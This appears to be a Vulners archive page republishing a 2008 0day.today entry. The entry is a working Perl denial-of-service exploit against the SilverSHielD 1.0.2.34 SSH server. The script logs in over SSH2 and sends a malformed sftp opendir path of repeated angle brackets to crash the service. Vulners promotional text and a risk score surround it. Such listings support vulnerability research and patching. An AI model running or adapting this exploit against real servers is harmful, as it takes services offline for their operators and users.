Lucene search
K

SilverSHielD 1.0.2.34 (opendir) Denial of Service Exploit

🗓️ 23 Oct 2008 00:00:00Reported by Jeremy BrownType 
zdt
 zdt
🔗 0day.today👁 28 Views

SilverSHielD 1.0.2.34 DoS exploit using opendi

Code
=========================================================
SilverSHielD 1.0.2.34 (opendir) Denial of Service Exploit
=========================================================





#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# SilverSHielD 1.0.2.34 DoS
use Net::SSH2;

$host     = "192.168.0.111";
$port     = 22;
$username = "test";
$password = "test123";
$dos      = "<<<<<<<<<<>>>>>>>>>>";

$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port)               || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$sftp = $ssh2->sftp();
$rename = $sftp->opendir($dos);
$ssh2->disconnect();
exit;



#  0day.today [2018-02-15]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Oct 2008 00:00Current
7High risk
Vulners AI Score7
28